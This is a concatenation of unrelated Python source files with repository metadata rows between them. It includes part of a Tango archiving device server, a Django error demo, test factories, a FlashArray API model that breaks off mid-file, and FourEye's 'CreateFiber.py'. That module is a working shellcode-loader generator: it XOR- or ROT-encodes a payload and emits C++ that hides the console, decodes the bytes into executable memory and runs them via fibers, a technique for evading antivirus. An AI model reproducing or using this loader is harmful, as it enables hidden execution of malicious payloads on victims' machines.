        # Reads are always allowed; read_dyn_attr itself raises if the data
        # is not yet cached.
        return True #self.IsDataReady(attr.name)
    def reader_hook(self,attribute,values):
        """This method will be executed by the ReaderProcess to process the queried data."""
        try:
            print('>'*80)
            print(time.ctime()+' In reader_hook(%s,[%d])'
                %(attribute,len(values)))
            self.counter-=1
            print(self.counter)
            MAXDIM = 1024*1024*1024
            #First create the attributes
            epoch,data,aname = [],[],attribute.replace('/','__')
            values = decimate_values(values)
            [(epoch.append(v[0]),data.append(v[1])) for v in values]
            writable = PyTango.AttrWriteType.READ
            #Adding time attribute
            # Inspect the first non-None value to decide Spectrum vs Image
            # layout and Double vs String element type.
            m,atformat,dims = None,PyTango.SpectrumAttr,[MAXDIM]
            for d in data:
                if d is not None:
                    if fn.isSequence(d):
                        atformat,dims = PyTango.ImageAttr,[MAXDIM,MAXDIM]
                        m = d[0]
                    else:
                        m = d
                    break
            attype = PyTango.DevDouble if (fn.isNumber(m) or fn.isBool(m)) else PyTango.DevString
            self.add_attribute(
                PyTango.ImageAttr(aname,attype,writable,MAXDIM,MAXDIM),
                self.read_dyn_attr,None,self.is_dyn_attr_allowed)
            self.add_attribute(
                PyTango.SpectrumAttr(aname+'_t',PyTango.DevDouble, writable,MAXDIM),
                self.read_dyn_attr,None,self.is_dyn_attr_allowed)
            self.add_attribute(
                PyTango.SpectrumAttr(aname+'_d',PyTango.DevString, writable,MAXDIM),
                self.read_dyn_attr,None,self.is_dyn_attr_allowed)
            #ARRAY
            self.add_attribute(atformat(aname+'_r',attype, writable,*dims),
                self.read_dyn_attr,None,self.is_dyn_attr_allowed)
            #LAST VALUE
            self.add_attribute(PyTango.Attr(aname+'_l',attype,PyTango.AttrWriteType.READ),
                self.read_dyn_attr,None,self.is_dyn_attr_allowed)
            #LAST DATE
            self.add_attribute(
                PyTango.Attr(aname+'_ld',PyTango.DevString,PyTango.AttrWriteType.READ),
                self.read_dyn_attr,None,self.is_dyn_attr_allowed)
            #Then add the data to Cache values, so IsDataReady will return True
            t = fn.now()
            self.RemoveCachedAttribute(attribute)
            self.AttrData[attribute] = (t,atformat,attype,values)
            print('Done: %s,%s,%s,%s,%d'%(attribute,t,atformat,attype,len(values)))
        except:
            print(traceback.format_exc())
    #------------------------------------------------------------------
    # Device constructor
    #------------------------------------------------------------------
    def __init__(self,cl, name):
        PyTango.Device_4Impl.__init__(self,cl,name)
        self.AttrData,self.reader = fandango.CaselessDict(),None #Created here to be init() proof
        PyExtractor.init_device(self)
    #------------------------------------------------------------------
    # Device destructor
    #------------------------------------------------------------------
    def delete_device(self):
        print time.ctime()+"[Device delete_device method] for device",self.get_name()
        # Stop the background reader and give it time to shut down cleanly.
        self.reader.stop()
        #del self.reader
        print 'Waiting 10 seconds'
        time.sleep(10.)
        print 'Finished'
    #------------------------------------------------------------------
    # Device initialization
    #------------------------------------------------------------------
    def init_device(self):
        print time.ctime()+"In ", self.get_name(), "::init_device()"
        self.counter = 0
        self.set_state(PyTango.DevState.ON)
        self.get_device_properties(self.get_device_class())
        # The reader survives init(); only create it on first initialization.
        if not self.reader:
            self.reader = PyTangoArchiving.reader.ReaderProcess(self.DbSchema)
        if self.AttrData: self.RemoveCachedAttributes()
    #------------------------------------------------------------------
    # Always excuted hook method
    #------------------------------------------------------------------
    def always_executed_hook(self):
        # Refresh the device status with cache contents and trigger any
        # scheduled periodic queries.
        msg = 'Attributes in cache:\n'
        for k,v in self.AttrData.items():
            msg+='\t%s: %s\n'%(k,fn.time2str(v[0]))
        print(time.ctime()+"In "+ self.get_name()+ "::always_executed_hook()"+'\n'+msg)
        status = 'The device is in %s state\n\n'%self.get_state()
        status += msg
        self.set_status(status)
        self.GetCurrentQueries()
    #==================================================================
    #
    #    PyExtractor read/write attribute methods
    #
    #==================================================================
    #------------------------------------------------------------------
    #    Read Attribute Hardware
    #------------------------------------------------------------------
    def read_attr_hardware(self,data):
        #print time.ctime()+"In ", self.get_name(), "::read_attr_hardware()"
        pass
    #==================================================================
    #
    #    PyExtractor command methods
    #
    #==================================================================
    @Cached(depth=30,expire=15.)
    def GetAttDataBetweenDates(self, argin):
        """
        Arguments to be AttrName, StartDate, StopDate, Synchronous
        If Synchronous is missing or False, data is buffered into attributes, which names are returned
        If True or Yes, all the data is returned when ready
        Data returned will be (rows,[t0,v0,t1,v1,t2,v2,...])
        """
        print time.ctime()+"In ", self.get_name(), "::GetAttDataBetweenDates(%s)"%argin
        #    Add your own code here
        # NOTE(review): 'size' is never used after this assignment.
        size = 0
        aname = argin[0]
        tag = self.attr2tag(aname)
        dates = self.dates2times(argin[1:3])
        RW = False
        synch = fn.searchCl('yes|true',str(argin[3:4]))
        # NOTE(review): both branches of this conditional are identical; the
        # non-RW case probably should not include tag+'_w' — confirm intent.
        attrs = [tag,tag+'_r',tag+'_w',tag+'_t'] if RW else [tag,tag+'_r',tag+'_w',tag+'_t']
        self.reader.get_attribute_values(aname,
            (lambda v: self.reader_hook(aname,v)),dates[0],dates[1],
            decimate=True, cache=self.UseApiCache)
        self.counter+=1
        print(self.counter)
        argout = [fn.shape(attrs),[a for a in attrs]]
        if not synch:
            print '\t%s'%argout
            return argout
        else:
            # Block until reader_hook() has filled the cache for this attribute.
            while not self.IsDataReady(aname):
                fandango.wait(0.1)
            data = self.AttrData[aname][-1]
            # NOTE(review): 'argout' still contains the shape/attr-name header
            # before the flattened t,v pairs are appended — verify callers
            # expect this layout.
            for t,v in data:
                argout.append(t)
                argout.extend(fn.toSequence(v))
            return [fn.shape(data),argout]
    def GetCachedAttribute(self,argin):
        # Return the full dynamic-attribute names (device/tag[,'_r','_t']).
        n,a = self.get_name(),self.attr2tag(argin)
        return [n+'/'+a+s for s in ('','_r','_t')]
    def RemoveCachedAttribute(self, argin):
        print time.ctime()+"In ", self.get_name(), "::RemoveCachedAttribute(%s)"%argin
        #    Add your own code here
        argin = self.tag2attr(argin)
        if argin in self.AttrData:
            data = self.AttrData.pop(argin)
            del data
        else:
            print('\tAttribute %s not in AttrData!!!!'%argin)
        # Dynamic attributes themselves are NOT removed: remove_attribute()
        # misbehaved in PyTango 7.2.2, hence the disabled block below.
        if False:
            #All this part disabled as it doesn't work well in PyTango 7.2.2
            try:
                attrlist = self.get_device_attr().get_attribute_list()
                attrlist = [a.get_name().lower() for a in attrlist]
                print 'Attributelist: %s'%[str(a) for a in attrlist]
            except:
                print traceback.format_exc()
            aname = argin.replace('/','__').lower()
            for s in ('','_r','_t',''):#,'_w'):
                try:
                    if aname in attrlist:
                        self.remove_attribute(aname+s)
                    else:
                        print('%s attribute does not exist!'%aname)
                except Exception,e:
                    print('\tremove_attribute(%s): %s'%(aname+s,e))
        return
    def RemoveCachedAttributes(self):
        print "In ", self.get_name(), "::RemoveCachedAttributes()"
        #    Add your own code here
        # NOTE(review): 'remove' (expired-only list) is computed but unused;
        # the loop below clears ALL cached attributes — confirm which was meant.
        remove = [a for a,v in self.AttrData.items() if v[0]<fn.now()-self.ExpireTime]
        for a in self.AttrData.keys()[:]:
            self.RemoveCachedAttribute(a)
    def IsArchived(self, argin):
        print "In ", self.get_name(), "::IsArchived()"
        #    Add your own code here
        return self.reader.is_attribute_archived(argin)
    def IsDataReady(self, argin):
        print "In ", self.get_name(), "::IsDataReady(%s)"%argin
        #    Add your own code here
        # True once reader_hook() has stored data for this attribute.
        aname = self.tag2attr(argin)
        argout = aname in self.AttrData
        print '\tIsDataReady(%s == %s): %s'%(argin,aname,argout)
        return argout
    def GetCurrentArchivedAtt(self):
        print "In ", self.get_name(), "::GetCurrentArchivedAtt()"
        #    Add your own code here
        return self.reader.get_attributes(active=True)
    @Cached(depth=30,expire=10.)
    def GetCurrentQueries(self):
        """Re-launch any PeriodicQueries whose cached data has expired;
        device state reflects whether queries are being executed."""
        print("In "+self.get_name()+"::GetCurrentQueries()")
        #self.get_device_properties()
        #if not self.is_command_polled('state'):
            #self.poll_command('state',3000)
        try:
            pending = []
            # Each PeriodicQueries entry is 'attr,start,stop,period'.
            for s in self.PeriodicQueries:
                s = s.split(',')
                a,t = s[0],max((float(s[-1]),self.ExpireTime))
                if a not in self.AttrData or self.AttrData[a][0]<(fn.now()-t):
                    if a in self.AttrData:
                        print('%s data is %s seconds old'%(a,fn.now()-self.AttrData[a][0]))
                    pending.append(s[:3])
            if pending:
                self.set_state(PyTango.DevState.RUNNING)
                print('Executing %d scheduled queries:\n%s'%(len(pending),'\n'.join(map(str,pending))))
                for p in pending:
                    self.GetAttDataBetweenDates(p)
            else:
                self.set_state(PyTango.DevState.ON)
        except:
            self.set_state(PyTango.DevState.FAULT)
            self.set_status(traceback.format_exc())
            print(self.get_status())
        return self.PeriodicQueries
    def AddPeriodicQuery(self,argin):
        """Persist a new periodic query (attr,start[,stop],period) in the
        PeriodicQueries device property; returns the dynamic attribute name."""
        attribute = argin[0]
        start = argin[1]
        stop = argin[2] if len(argin)==4 else '-1'
        # NOTE(review): with a 3-element argin this raises IndexError;
        # period was presumably meant to be argin[-1] — confirm.
        period = argin[3]
        self.get_device_properties()
        queries = dict(p.split(',',1) for p in self.PeriodicQueries)
        queries[attribute]='%s,%s,%s,%s'%(attribute,start,stop,period)
        fandango.tango.put_device_property(self.get_name(),'PeriodicQueries',sorted(queries.values()))
        self.get_device_properties()
        return self.get_name()+'/'+self.attr2tag(attribute)
#==================================================================
#
# PyExtractorClass class definition
#
#==================================================================
class PyExtractorClass(PyTango.DeviceClass):
    """Tango DeviceClass: declarative schema (properties, commands,
    attributes) for the PyExtractor device server."""
    #    Class Properties
    class_property_list = {
        'AliasFile':
            [PyTango.DevString,
            "",
            [] ],
        'DbConfig':
            [PyTango.DevString,
            "",
            [] ],
        'DbHost':
            [PyTango.DevString,
            "",
            [] ],
        }
    #    Device Properties
    device_property_list = {
        'DbSchema':
            [PyTango.DevString,
            "Database to use (hdb/tdb)",
            ["hdb"] ],
        'UseApiCache':
            [PyTango.DevBoolean,
            "Enable/Disable Reader Cache",
            [ True ] ],
        'ExpireTime':
            [PyTango.DevLong,
            "Seconds to cache each request",
            [ 180 ] ],
        'PeriodicQueries':
            [PyTango.DevVarStringArray,
            "Queries to be executed periodically: Attr,Start,Stop,Period(s)",
            [ ] ],
        }
    #    Command definitions
    cmd_list = {
        'GetAttDataBetweenDates':
            [[PyTango.DevVarStringArray, ""],
            [PyTango.DevVarLongStringArray, ""]],
        'GetCachedAttribute':
            [[PyTango.DevString, ""],
            [PyTango.DevVarStringArray, ""]],
        'RemoveCachedAttribute':
            [[PyTango.DevString, ""],
            [PyTango.DevVoid, ""]],
        'RemoveCachedAttributes':
            [[PyTango.DevVoid, ""],
            [PyTango.DevVoid, ""]],
        'IsArchived':
            [[PyTango.DevString, ""],
            [PyTango.DevBoolean, ""]],
        'IsDataReady':
            [[PyTango.DevString, "Requested attribute"],
            [PyTango.DevBoolean, ""]],
        'GetCurrentArchivedAtt':
            [[PyTango.DevVoid, ""],
            [PyTango.DevVarStringArray, ""]],
        'GetCurrentQueries':
            [[PyTango.DevVoid, ""],
            [PyTango.DevVarStringArray, ""],
            {
                # Polled so expired periodic queries are relaunched regularly.
                'Polling period': "15000",
            } ],
        'AddPeriodicQuery':
            [[PyTango.DevVarStringArray, ""],
            [PyTango.DevString, ""]],
        }
    #    Attribute definitions
    attr_list = {
        }
    #------------------------------------------------------------------
    #    PyExtractorClass Constructor
    #------------------------------------------------------------------
    def __init__(self, name):
        PyTango.DeviceClass.__init__(self, name)
        self.set_type(name);
        print "In PyExtractorClass constructor"
#==================================================================
#
# PyExtractor class main method
#
#==================================================================
if __name__ == '__main__':
    try:
        # Standard Tango server bootstrap: register the class and run the
        # CORBA event loop until the server is shut down.
        py = PyTango.Util(sys.argv)
        py.add_TgClass(PyExtractorClass,PyExtractor,'PyExtractor')
        U = PyTango.Util.instance()
        U.server_init()
        U.server_run()
    except PyTango.DevFailed,e:
        print '-------> Received a DevFailed exception:',e
    except Exception,e:
        print '-------> An unforeseen exception occured....',e
| 37.457539 | 141 | 0.493222 |
4003ec8c48661a32fac34b3ba2bb854d8f83ded8 | 166 | py | Python | sentry-handle-exceptions-django-projects/step2/djsentry/errors/views.py | fullstackpython/blog-code-examples | a6afcb874e88086686071aa1b2a47548aed5a2b0 | [
"MIT"
] | 65 | 2017-06-13T01:02:17.000Z | 2022-01-10T09:58:29.000Z | sentry-handle-exceptions-django-projects/step2/djsentry/errors/views.py | fullstackpython/blog-code-examples | a6afcb874e88086686071aa1b2a47548aed5a2b0 | [
"MIT"
] | 1 | 2020-06-05T18:07:42.000Z | 2020-06-05T18:07:42.000Z | sentry-handle-exceptions-django-projects/step2/djsentry/errors/views.py | fullstackpython/blog-code-examples | a6afcb874e88086686071aa1b2a47548aed5a2b0 | [
"MIT"
] | 50 | 2017-07-01T02:10:19.000Z | 2022-03-24T17:23:58.000Z | # djsentry/errors/views.py
from django.shortcuts import render
def errors_index(request):
division_by_zero = 1 / 0
return render(request, 'index.html', {})
| 20.75 | 44 | 0.722892 |
4cf4e85665ff423c4d1f484a17e4444a99b2ad7d | 599 | py | Python | tests/factories.py | oriolpiera/anem-per-feina | 006d2f105596d17afd1d121cccabe97ce6ff3b55 | [
"MIT"
] | null | null | null | tests/factories.py | oriolpiera/anem-per-feina | 006d2f105596d17afd1d121cccabe97ce6ff3b55 | [
"MIT"
] | null | null | null | tests/factories.py | oriolpiera/anem-per-feina | 006d2f105596d17afd1d121cccabe97ce6ff3b55 | [
"MIT"
] | null | null | null | import factory
from jobsapp.models import User, Job
# List of factories
class UserFactory(factory.django.DjangoModelFactory):
    """Factory for User rows; get-or-create is keyed on the name fields,
    so repeated calls with the defaults reuse the same 'John Doe' row."""
    class Meta:
        model = User
        django_get_or_create = ('first_name', 'last_name')
    first_name = 'John'
    last_name = 'Doe'
class JobFactory(factory.django.DjangoModelFactory):
    """Factory for Job rows with sequential titles and descriptions."""
    class Meta:
        model = Job
        # django_get_or_create must be an iterable of field names; the
        # original bare string ('type') would be iterated character by
        # character ('t', 'y', 'p', 'e') by factory_boy.
        django_get_or_create = ('type',)
    # Reference the factory class directly: the original dotted path
    # 'jobsapp.tests.UserFactory' does not match this module's location
    # (tests.factories) and would fail to import at build time.
    user = factory.SubFactory(UserFactory)
    title = factory.Sequence(lambda n: 'Title %d' % n)
    description = factory.Sequence(lambda n: 'Description %d' % n)
    type = '1'
| 24.958333 | 66 | 0.674457 |
d16a14b78267943236614a842c40de93ddaef236 | 3,502 | py | Python | module/memory/CreateFiber.py | zhzyker/FourEye | 55c9a5b45f69dab736821a4c696ce4398605303c | [
"Apache-2.0"
] | 1 | 2021-09-14T09:39:56.000Z | 2021-09-14T09:39:56.000Z | module/memory/CreateFiber.py | zhzyker/FourEye | 55c9a5b45f69dab736821a4c696ce4398605303c | [
"Apache-2.0"
] | null | null | null | module/memory/CreateFiber.py | zhzyker/FourEye | 55c9a5b45f69dab736821a4c696ce4398605303c | [
"Apache-2.0"
] | 1 | 2021-08-31T13:48:37.000Z | 2021-08-31T13:48:37.000Z | #!/usr/bin/python
import sys
import os
from termcolor import colored
def rot_compailed(shellcode_size, shellcode):
load = '''
#include <windows.h>
int main()
{
FreeConsole();
PVOID mainFiber = ConvertThreadToFiber(NULL);
unsigned char shellcode[] ;
for (int i = 0; i < sizeof shellcode; i++)
{
shellcode[i] = shellcode[i] - 13;
}
PVOID shellcodeLocation = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(shellcodeLocation, shellcode, sizeof shellcode);
PVOID shellcodeFiber = CreateFiber(NULL, (LPFIBER_START_ROUTINE)shellcodeLocation, NULL);
SwitchToFiber(shellcodeFiber);
return 0;
}
'''
loads = load.replace('shellcode[]', shellcode, 1)
with open('/root/shellcode.cpp', 'w+') as f:
f.write(loads)
def xor_compailed(shellcode_size, shellcode):
load = '''
#include <windows.h>
int main()
{
FreeConsole();
PVOID mainFiber = ConvertThreadToFiber(NULL);
unsigned char shellcode[] ;
for (int i = 0; i < sizeof shellcode; i++)
{
shellcode[i] = shellcode[i] ^ 0x11 ^ 0x55;
}
PVOID shellcodeLocation = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(shellcodeLocation, shellcode, sizeof shellcode);
PVOID shellcodeFiber = CreateFiber(NULL, (LPFIBER_START_ROUTINE)shellcodeLocation, NULL);
SwitchToFiber(shellcodeFiber);
return 0;
}
'''
loads = load.replace('shellcode[]', shellcode, 1)
with open('/root/shellcode.cpp', 'w+') as f:
f.write(loads)
def Fiber_rot_13():
shellcode_add = input("\033[4mPlease input Shellcode:\033[0m" + colored(" >>", "green"))
shellcode = ''
shellcode_size = 0
try:
with open(shellcode_add, 'rb') as f:
while True:
code = f.read(1)
if not code:
break
base10 = ord(code) + 0x0D
code_hex = hex(base10)
code_hex = code_hex.replace('0x', '')
if (len(code_hex) == 1):
code_hex = '0' + code_hex
shellcode += r'\x' + code_hex
shellcode_size += 1
f.close()
except Exception as e:
sys.stderr.writelines(str(e))
shellcodes = "shellcode[] = \"" + shellcode + "\""
rot_compailed(shellcode_size, shellcodes)
def Fiber_xor_13():
shellcode_add = input("\033[4mPlease input Shellcode:\033[0m" + colored(" >>", "green"))
shellcode = ''
new_shellcode = ''
shellcode_size = 0
try:
with open(shellcode_add, 'rb') as f:
while True:
code = f.read(1)
if not code:
break
base10 = ord(code) ^ 0x55 ^ 0x11
code_hex = hex(base10)
code_hex = code_hex.replace('0x', '')
if (len(code_hex) == 1):
code_hex = '0' + code_hex
shellcode += r'\x' + code_hex
shellcode_size += 1
f.close()
except Exception as e:
sys.stderr.writelines(str(e))
shellcodes = "shellcode[] = \"" + shellcode + "\""
xor_compailed(shellcode_size, shellcodes) | 28.241935 | 104 | 0.531696 |
9b8e35f838902bc89cdb4b5edab89784478335dc | 20,725 | py | Python | pypureclient/flasharray/FA_2_7/models/host_group_performance_by_array.py | Flav-STOR-WL/py-pure-client | 03b889c997d90380ac5d6380ca5d5432792d3e89 | [
"BSD-2-Clause"
] | 14 | 2018-12-07T18:30:27.000Z | 2022-02-22T09:12:33.000Z | pypureclient/flasharray/FA_2_7/models/host_group_performance_by_array.py | Flav-STOR-WL/py-pure-client | 03b889c997d90380ac5d6380ca5d5432792d3e89 | [
"BSD-2-Clause"
] | 28 | 2019-09-17T21:03:52.000Z | 2022-03-29T22:07:35.000Z | pypureclient/flasharray/FA_2_7/models/host_group_performance_by_array.py | Flav-STOR-WL/py-pure-client | 03b889c997d90380ac5d6380ca5d5432792d3e89 | [
"BSD-2-Clause"
] | 15 | 2020-06-11T15:50:08.000Z | 2022-03-21T09:27:25.000Z | # coding: utf-8
"""
FlashArray REST API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: 2.7
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re
import six
import typing
from ....properties import Property
if typing.TYPE_CHECKING:
from pypureclient.flasharray.FA_2_7 import models
class HostGroupPerformanceByArray(object):
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'bytes_per_mirrored_write': 'int',
'bytes_per_op': 'int',
'bytes_per_read': 'int',
'bytes_per_write': 'int',
'mirrored_write_bytes_per_sec': 'int',
'mirrored_writes_per_sec': 'int',
'qos_rate_limit_usec_per_mirrored_write_op': 'int',
'qos_rate_limit_usec_per_read_op': 'int',
'qos_rate_limit_usec_per_write_op': 'int',
'queue_usec_per_mirrored_write_op': 'int',
'queue_usec_per_read_op': 'int',
'queue_usec_per_write_op': 'int',
'read_bytes_per_sec': 'int',
'reads_per_sec': 'int',
'san_usec_per_mirrored_write_op': 'int',
'san_usec_per_read_op': 'int',
'san_usec_per_write_op': 'int',
'service_usec_per_mirrored_write_op': 'int',
'service_usec_per_read_op': 'int',
'service_usec_per_write_op': 'int',
'time': 'int',
'usec_per_mirrored_write_op': 'int',
'usec_per_read_op': 'int',
'usec_per_write_op': 'int',
'write_bytes_per_sec': 'int',
'writes_per_sec': 'int',
'service_usec_per_read_op_cache_reduction': 'float',
'id': 'str',
'name': 'str',
'array': 'Resource'
}
attribute_map = {
'bytes_per_mirrored_write': 'bytes_per_mirrored_write',
'bytes_per_op': 'bytes_per_op',
'bytes_per_read': 'bytes_per_read',
'bytes_per_write': 'bytes_per_write',
'mirrored_write_bytes_per_sec': 'mirrored_write_bytes_per_sec',
'mirrored_writes_per_sec': 'mirrored_writes_per_sec',
'qos_rate_limit_usec_per_mirrored_write_op': 'qos_rate_limit_usec_per_mirrored_write_op',
'qos_rate_limit_usec_per_read_op': 'qos_rate_limit_usec_per_read_op',
'qos_rate_limit_usec_per_write_op': 'qos_rate_limit_usec_per_write_op',
'queue_usec_per_mirrored_write_op': 'queue_usec_per_mirrored_write_op',
'queue_usec_per_read_op': 'queue_usec_per_read_op',
'queue_usec_per_write_op': 'queue_usec_per_write_op',
'read_bytes_per_sec': 'read_bytes_per_sec',
'reads_per_sec': 'reads_per_sec',
'san_usec_per_mirrored_write_op': 'san_usec_per_mirrored_write_op',
'san_usec_per_read_op': 'san_usec_per_read_op',
'san_usec_per_write_op': 'san_usec_per_write_op',
'service_usec_per_mirrored_write_op': 'service_usec_per_mirrored_write_op',
'service_usec_per_read_op': 'service_usec_per_read_op',
'service_usec_per_write_op': 'service_usec_per_write_op',
'time': 'time',
'usec_per_mirrored_write_op': 'usec_per_mirrored_write_op',
'usec_per_read_op': 'usec_per_read_op',
'usec_per_write_op': 'usec_per_write_op',
'write_bytes_per_sec': 'write_bytes_per_sec',
'writes_per_sec': 'writes_per_sec',
'service_usec_per_read_op_cache_reduction': 'service_usec_per_read_op_cache_reduction',
'id': 'id',
'name': 'name',
'array': 'array'
}
required_args = {
}
def __init__(
self,
bytes_per_mirrored_write=None, # type: int
bytes_per_op=None, # type: int
bytes_per_read=None, # type: int
bytes_per_write=None, # type: int
mirrored_write_bytes_per_sec=None, # type: int
mirrored_writes_per_sec=None, # type: int
qos_rate_limit_usec_per_mirrored_write_op=None, # type: int
qos_rate_limit_usec_per_read_op=None, # type: int
qos_rate_limit_usec_per_write_op=None, # type: int
queue_usec_per_mirrored_write_op=None, # type: int
queue_usec_per_read_op=None, # type: int
queue_usec_per_write_op=None, # type: int
read_bytes_per_sec=None, # type: int
reads_per_sec=None, # type: int
san_usec_per_mirrored_write_op=None, # type: int
san_usec_per_read_op=None, # type: int
san_usec_per_write_op=None, # type: int
service_usec_per_mirrored_write_op=None, # type: int
service_usec_per_read_op=None, # type: int
service_usec_per_write_op=None, # type: int
time=None, # type: int
usec_per_mirrored_write_op=None, # type: int
usec_per_read_op=None, # type: int
usec_per_write_op=None, # type: int
write_bytes_per_sec=None, # type: int
writes_per_sec=None, # type: int
service_usec_per_read_op_cache_reduction=None, # type: float
id=None, # type: str
name=None, # type: str
array=None, # type: models.Resource
):
"""
Keyword args:
bytes_per_mirrored_write (int): The average I/O size per mirrored write. Measured in bytes.
bytes_per_op (int): The average I/O size for both read and write (all) operations.
bytes_per_read (int): The average I/O size per read. Measured in bytes.
bytes_per_write (int): The average I/O size per write. Measured in bytes.
mirrored_write_bytes_per_sec (int): The number of mirrored bytes written per second.
mirrored_writes_per_sec (int): The number of mirrored writes per second.
qos_rate_limit_usec_per_mirrored_write_op (int): The average time it takes the array to process a mirrored I/O write request. Measured in microseconds.
qos_rate_limit_usec_per_read_op (int): The average time spent waiting due to QoS rate limiting for a read request. Measured in microseconds.
qos_rate_limit_usec_per_write_op (int): The average time that a write I/O request spends waiting as a result of the volume reaching its QoS bandwidth limit. Measured in microseconds.
queue_usec_per_mirrored_write_op (int): The average time that a mirrored write I/O request spends in the array waiting to be served. Measured in microseconds.
queue_usec_per_read_op (int): The average time that a read I/O request spends in the array waiting to be served. Measured in microseconds.
queue_usec_per_write_op (int): The average time that a write I/O request spends in the array waiting to be served. Measured in microseconds.
read_bytes_per_sec (int): The number of bytes read per second.
reads_per_sec (int): The number of read requests processed per second.
san_usec_per_mirrored_write_op (int): The average time required to transfer data from the initiator to the array for a mirrored write request. Measured in microseconds.
san_usec_per_read_op (int): The average time required to transfer data from the array to the initiator for a read request. Measured in microseconds.
san_usec_per_write_op (int): The average time required to transfer data from the initiator to the array for a write request. Measured in microseconds.
service_usec_per_mirrored_write_op (int): The average time required for the array to service a mirrored write request. Measured in microseconds.
service_usec_per_read_op (int): The average time required for the array to service a read request. Measured in microseconds.
service_usec_per_write_op (int): The average time required for the array to service a write request. Measured in microseconds.
time (int): The time when the sample performance data was taken. Measured in milliseconds since the UNIX epoch.
usec_per_mirrored_write_op (int): The average time it takes the array to process a mirrored I/O write request. Measured in microseconds. The average time does not include SAN time, queue time, or QoS rate limit time.
usec_per_read_op (int): The average time it takes the array to process an I/O read request. Measured in microseconds. The average time does not include SAN time, queue time, or QoS rate limit time.
usec_per_write_op (int): The average time it takes the array to process an I/O write request. Measured in microseconds. The average time does not include SAN time, queue time, or QoS rate limit time.
write_bytes_per_sec (int): The number of bytes written per second.
writes_per_sec (int): The number of write requests processed per second.
service_usec_per_read_op_cache_reduction (float): The percentage reduction in `service_usec_per_read_op` due to data cache hits. For example, a value of 0.25 indicates that the value of `service_usec_per_read_op` is 25% lower than it would have been without any data cache hits.
id (str): A globally unique, system-generated ID. The ID cannot be modified and cannot refer to another resource.
name (str): A user-specified name. The name must be locally unique and can be changed.
array (Resource): The array on which the performance metrics were recorded.
"""
if bytes_per_mirrored_write is not None:
self.bytes_per_mirrored_write = bytes_per_mirrored_write
if bytes_per_op is not None:
self.bytes_per_op = bytes_per_op
if bytes_per_read is not None:
self.bytes_per_read = bytes_per_read
if bytes_per_write is not None:
self.bytes_per_write = bytes_per_write
if mirrored_write_bytes_per_sec is not None:
self.mirrored_write_bytes_per_sec = mirrored_write_bytes_per_sec
if mirrored_writes_per_sec is not None:
self.mirrored_writes_per_sec = mirrored_writes_per_sec
if qos_rate_limit_usec_per_mirrored_write_op is not None:
self.qos_rate_limit_usec_per_mirrored_write_op = qos_rate_limit_usec_per_mirrored_write_op
if qos_rate_limit_usec_per_read_op is not None:
self.qos_rate_limit_usec_per_read_op = qos_rate_limit_usec_per_read_op
if qos_rate_limit_usec_per_write_op is not None:
self.qos_rate_limit_usec_per_write_op = qos_rate_limit_usec_per_write_op
if queue_usec_per_mirrored_write_op is not None:
self.queue_usec_per_mirrored_write_op = queue_usec_per_mirrored_write_op
if queue_usec_per_read_op is not None:
self.queue_usec_per_read_op = queue_usec_per_read_op
if queue_usec_per_write_op is not None:
self.queue_usec_per_write_op = queue_usec_per_write_op
if read_bytes_per_sec is not None:
self.read_bytes_per_sec = read_bytes_per_sec
if reads_per_sec is not None:
self.reads_per_sec = reads_per_sec
if san_usec_per_mirrored_write_op is not None:
self.san_usec_per_mirrored_write_op = san_usec_per_mirrored_write_op
if san_usec_per_read_op is not None:
self.san_usec_per_read_op = san_usec_per_read_op
if san_usec_per_write_op is not None:
self.san_usec_per_write_op = san_usec_per_write_op
if service_usec_per_mirrored_write_op is not None:
self.service_usec_per_mirrored_write_op = service_usec_per_mirrored_write_op
if service_usec_per_read_op is not None:
self.service_usec_per_read_op = service_usec_per_read_op
if service_usec_per_write_op is not None:
self.service_usec_per_write_op = service_usec_per_write_op
if time is not None:
self.time = time
if usec_per_mirrored_write_op is not None:
self.usec_per_mirrored_write_op = usec_per_mirrored_write_op
if usec_per_read_op is not None:
self.usec_per_read_op = usec_per_read_op
if usec_per_write_op is not None:
self.usec_per_write_op = usec_per_write_op
if write_bytes_per_sec is not None:
self.write_bytes_per_sec = write_bytes_per_sec
if writes_per_sec is not None:
self.writes_per_sec = writes_per_sec
if service_usec_per_read_op_cache_reduction is not None:
self.service_usec_per_read_op_cache_reduction = service_usec_per_read_op_cache_reduction
if id is not None:
self.id = id
if name is not None:
self.name = name
if array is not None:
self.array = array
def __setattr__(self, key, value):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `HostGroupPerformanceByArray`".format(key))
if key == "bytes_per_mirrored_write" and value is not None:
if value < 0:
raise ValueError("Invalid value for `bytes_per_mirrored_write`, must be a value greater than or equal to `0`")
if key == "bytes_per_op" and value is not None:
if value < 0:
raise ValueError("Invalid value for `bytes_per_op`, must be a value greater than or equal to `0`")
if key == "bytes_per_read" and value is not None:
if value < 0:
raise ValueError("Invalid value for `bytes_per_read`, must be a value greater than or equal to `0`")
if key == "bytes_per_write" and value is not None:
if value < 0:
raise ValueError("Invalid value for `bytes_per_write`, must be a value greater than or equal to `0`")
if key == "mirrored_write_bytes_per_sec" and value is not None:
if value < 0:
raise ValueError("Invalid value for `mirrored_write_bytes_per_sec`, must be a value greater than or equal to `0`")
if key == "mirrored_writes_per_sec" and value is not None:
if value < 0:
raise ValueError("Invalid value for `mirrored_writes_per_sec`, must be a value greater than or equal to `0`")
if key == "qos_rate_limit_usec_per_mirrored_write_op" and value is not None:
if value < 0:
raise ValueError("Invalid value for `qos_rate_limit_usec_per_mirrored_write_op`, must be a value greater than or equal to `0`")
if key == "qos_rate_limit_usec_per_read_op" and value is not None:
if value < 0:
raise ValueError("Invalid value for `qos_rate_limit_usec_per_read_op`, must be a value greater than or equal to `0`")
if key == "qos_rate_limit_usec_per_write_op" and value is not None:
if value < 0:
raise ValueError("Invalid value for `qos_rate_limit_usec_per_write_op`, must be a value greater than or equal to `0`")
if key == "queue_usec_per_mirrored_write_op" and value is not None:
if value < 0:
raise ValueError("Invalid value for `queue_usec_per_mirrored_write_op`, must be a value greater than or equal to `0`")
if key == "queue_usec_per_read_op" and value is not None:
if value < 0:
raise ValueError("Invalid value for `queue_usec_per_read_op`, must be a value greater than or equal to `0`")
